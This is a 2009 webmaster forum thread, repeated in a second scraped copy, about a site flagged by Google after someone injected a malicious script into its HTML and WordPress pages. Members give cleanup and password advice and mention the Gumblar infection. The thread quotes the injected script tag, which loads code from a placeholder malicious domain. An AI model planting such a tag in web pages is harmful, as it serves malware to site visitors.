"This Site May Harm Your Computer" Help

mobility · 11-15-2009, 10:39 PM

I visited my website today, and I was greeted with a "Reported Attack Site" message from Google in a large, red box. When someone searches for my keyword in Google (when using Firefox), underneath my website title in the SERPS, Google has added this message: "This site may harm your computer." This message doesn't appear in IE or Opera -- just Firefox and Chrome.

Turns out, someone has injected a malicious script inside the HTML/PHP pages on my website. The code looks like this:

<script src=http://maliciousdomain.com/libraries/CREDITS.php> **end script tag** Basically, someone was trying to inject Javascript links into my pages.

I have contacted my webhost about the script injection -- asking how it was done, and how to prevent future injections. No word yet from the webhost. In the meantime, I have removed all the rogue scripts. According to Google, I'm now supposed to create a Webmaster Tools account and submit a "review request" so that they can remove the big, red warning message.

I've heard very bad things about opening & using a Webmaster Tools account. There are various SEO's who claim that you should not use Webmaster Tools. My question: Will the message "This site may harm your computer" disappear on its own (over time), or am I required to open a Webmaster Tools account?

pdjsolutions · 11-15-2009, 11:00 PM

Well, using a webmaster-tools account doesnt harm your website in anyway.

Like the SEO's say, they actually mean that you should not use the tools the webmaster-tools account gives, but thats not true.

Opening a webmaster Tools account is like opening any other account, like an email account.

After going there and adding your webpage to the account and verifying it. you then have to send a review for the checking the website again by google.

You have to do this to remove that message [ i do not think it goes away in time but i am not sure ] , but this is best option and again opening a webmaster tools account doesnt affect your website.

Also, you should follow certain steps.

1 ) First is to change your FTP password to the web hosting account.
2 ) Make sure you dont have any virus on your computer as well [ most Attack sites come from codes within the computer and get uploaded via FTP ]
3 ) Make sure you have a good webhost which keeps scanning their servers for virus.

Hope this helps.
All the best.

Prateek
PDJSolutions

11-15-2009, 11:03 PM

If it was a wordpress site then you just joined a million others that have the same problem every year. You should secure your wordpress blog and stop depending upon wordpress developers to do it for you...

James

mobility · 11-15-2009, 11:17 PM

James - The domain itself is static HTML. However, I do have a Wordpress blog inside a directory (blog) off the root domain. The rogue script was added to 4 static HTML pages, along with most of the blog pages. How exactly would I "secure my Wordpress blog"? I had no idea people could add rogue scripts to my pages without my knowledge or consent!

Prateek - Thanks very much. Guess I'm stuck with creating a Webmaster Tools account and requesting a review. I have always run anti-virus on my local machines, and I've already changed WHM & Cpanel passwords. Am curious to hear from my webhost about how this happened (and how to make sure it doesn't happen again!).

11-15-2009, 11:25 PM

Quote:

Originally Posted by mobility

James - The domain itself is static HTML. However, I do have a Wordpress blog inside a directory (blog) off the root domain. The rogue script was added to 4 static HTML pages, along with most of the blog pages. How exactly would I "secure my Wordpress blog"? I had no idea people could add rogue scripts to my pages without my knowledge or consent!

Prateek - Thanks very much. Guess I'm stuck with creating a Webmaster Tools account and requesting a review. I have always run anti-virus on my local machines, and I've already changed WHM & Cpanel passwords. Am curious to hear from my webhost about how this happened (and how to make sure it doesn't happen again!).

Once they access through your wordpress blog they can get access to everything on your domain. Sent you a PM ...

James

banless · 11-16-2009, 02:02 AM

If you know html and how to read code then just look at the bottom of your pages for any strange looking code, it should be pretty easy to spot. If you find anything out of place then do a find and replace so that you can remove the code from any page where it might be on in your site, then upload the changes and request a review. Google responds to these pretty fast, just make sure your site is clean before you submit your request.

Also, make sure that your wordpress password is NOT the same password that you use for your main site (in other words the password that you use to login into your hosting server). And use strong passwords that you yourself have a hard time remembering for example: %gt7/*<,kl6, these are very hard passwords to hack, but it is not impossible. Nevertheless, it is alot more secure. Hopefully you get this taken care of.

NickArnold · 11-16-2009, 04:00 AM

Sounds like 'Gumblar' to me.

Don't quote me on this because i'm no security expert:

Usually this virus spreads by you visiting a site that is already infected - The Javascript on that site automatically installs some software something onto your machine to steal your FTP details and then with these details the code is placed on your site also...

Not sure if this is done automatically or by humans....

There are hidden ad's placed on the infected sites also, providing income to the hackers with visitors clicking hidden PPC ad's.

Best way to protect yourself. Change your FTP details. Don't save details in the 'Site Manager' facility. Have good virus protection software. A-Squared is a free one that was suggested to us.

Again i might be well off the case here. But i work for an IT Company and thats what our security department suggested about these attacked sites...

mobility · 11-16-2009, 04:58 PM

Hmm, thanks very much Nick. I searched for "Gumblar" and this page describes what I've experienced pretty well: Revenge of Gumblar Zombies | Unmask Parasites. Blog.

I have always run anti-virus on all local machines. Fortunately, my webhost has removed the infected code so my site is completely clean now. Next step: get rid of the Google warning.

11-15-2009, 10:39 PM	#1
mobility Active Warrior Join Date: Feb 2008 Location: , , . Posts: 45 Thanks: 3 Thanked 1 Time in 1 Post	"This Site May Harm Your Computer" Help I visited my website today, and I was greeted with a "Reported Attack Site" message from Google in a large, red box. When someone searches for my keyword in Google (when using Firefox), underneath my website title in the SERPS, Google has added this message: "This site may harm your computer." This message doesn't appear in IE or Opera -- just Firefox and Chrome. Turns out, someone has injected a malicious script inside the HTML/PHP pages on my website. The code looks like this: <script src=http://maliciousdomain.com/libraries/CREDITS.php> end script tag Basically, someone was trying to inject Javascript links into my pages. I have contacted my webhost about the script injection -- asking how it was done, and how to prevent future injections. No word yet from the webhost. In the meantime, I have removed all the rogue scripts. According to Google, I'm now supposed to create a Webmaster Tools account and submit a "review request" so that they can remove the big, red warning message. I've heard very bad things about opening & using a Webmaster Tools account. There are various SEO's who claim that you should not use Webmaster Tools. My question: Will the message "This site may harm your computer" disappear on its own (over time), or am I required to open a Webmaster Tools account?

11-15-2009, 11:00 PM	#2
pdjsolutions Coding Expert !! :D War Room Member Join Date: May 2009 Location: India Posts: 178 Thanks: 14 Thanked 15 Times in 12 Posts Contact Info	Re: "This Site May Harm Your Computer" Help Well, using a webmaster-tools account doesnt harm your website in anyway. Like the SEO's say, they actually mean that you should not use the tools the webmaster-tools account gives, but thats not true. Opening a webmaster Tools account is like opening any other account, like an email account. After going there and adding your webpage to the account and verifying it. you then have to send a review for the checking the website again by google. You have to do this to remove that message [ i do not think it goes away in time but i am not sure ] , but this is best option and again opening a webmaster tools account doesnt affect your website. Also, you should follow certain steps. 1 ) First is to change your FTP password to the web hosting account. 2 ) Make sure you dont have any virus on your computer as well [ most Attack sites come from codes within the computer and get uploaded via FTP ] 3 ) Make sure you have a good webhost which keeps scanning their servers for virus. Hope this helps. All the best. Prateek PDJSolutions
	CSS3 Tutorials

11-15-2009, 11:03 PM	#3
TheRichJerksNet Guest Posts: n/a	Re: "This Site May Harm Your Computer" Help If it was a wordpress site then you just joined a million others that have the same problem every year. You should secure your wordpress blog and stop depending upon wordpress developers to do it for you... James
TheRichJerksNet Guest Posts: n/a

11-15-2009, 11:17 PM	#4
mobility Active Warrior Join Date: Feb 2008 Location: , , . Posts: 45 Thanks: 3 Thanked 1 Time in 1 Post	Re: "This Site May Harm Your Computer" Help James - The domain itself is static HTML. However, I do have a Wordpress blog inside a directory (blog) off the root domain. The rogue script was added to 4 static HTML pages, along with most of the blog pages. How exactly would I "secure my Wordpress blog"? I had no idea people could add rogue scripts to my pages without my knowledge or consent! Prateek - Thanks very much. Guess I'm stuck with creating a Webmaster Tools account and requesting a review. I have always run anti-virus on my local machines, and I've already changed WHM & Cpanel passwords. Am curious to hear from my webhost about how this happened (and how to make sure it doesn't happen again!).

11-16-2009, 02:02 AM	#6
banless Active Warrior Join Date: Aug 2009 Location: the 206 Posts: 51 Thanks: 1 Thanked 3 Times in 3 Posts	Re: "This Site May Harm Your Computer" Help If you know html and how to read code then just look at the bottom of your pages for any strange looking code, it should be pretty easy to spot. If you find anything out of place then do a find and replace so that you can remove the code from any page where it might be on in your site, then upload the changes and request a review. Google responds to these pretty fast, just make sure your site is clean before you submit your request. Also, make sure that your wordpress password is NOT the same password that you use for your main site (in other words the password that you use to login into your hosting server). And use strong passwords that you yourself have a hard time remembering for example: %gt7/*<,kl6, these are very hard passwords to hack, but it is not impossible. Nevertheless, it is alot more secure. Hopefully you get this taken care of.
	Internet Web Directory index-it.net. Seattle SEO Services Seattle Search Engine Optimization Seattle Business Directory Seattle SEO Forum

11-16-2009, 04:00 AM	#7
NickArnold Guru in training ;) War Room Member Join Date: Oct 2006 Location: Walsall, West Midlands, UK. Posts: 122 Thanks: 32 Thanked 15 Times in 8 Posts Social Networking	Re: "This Site May Harm Your Computer" Help Sounds like 'Gumblar' to me. Don't quote me on this because i'm no security expert: Usually this virus spreads by you visiting a site that is already infected - The Javascript on that site automatically installs some software something onto your machine to steal your FTP details and then with these details the code is placed on your site also... Not sure if this is done automatically or by humans.... There are hidden ad's placed on the infected sites also, providing income to the hackers with visitors clicking hidden PPC ad's. Best way to protect yourself. Change your FTP details. Don't save details in the 'Site Manager' facility. Have good virus protection software. A-Squared is a free one that was suggested to us. Again i might be well off the case here. But i work for an IT Company and thats what our security department suggested about these attacked sites...
	Nick Arnold Blog \| Web Design Birmingham \| Nick Arnold Twitter

11-16-2009, 04:58 PM	#8
mobility Active Warrior Join Date: Feb 2008 Location: , , . Posts: 45 Thanks: 3 Thanked 1 Time in 1 Post	Re: "This Site May Harm Your Computer" Help Hmm, thanks very much Nick. I searched for "Gumblar" and this page describes what I've experienced pretty well: Revenge of Gumblar Zombies \| Unmask Parasites. Blog. I have always run anti-virus on all local machines. Fortunately, my webhost has removed the infected code so my site is completely clean now. Next step: get rid of the Google warning.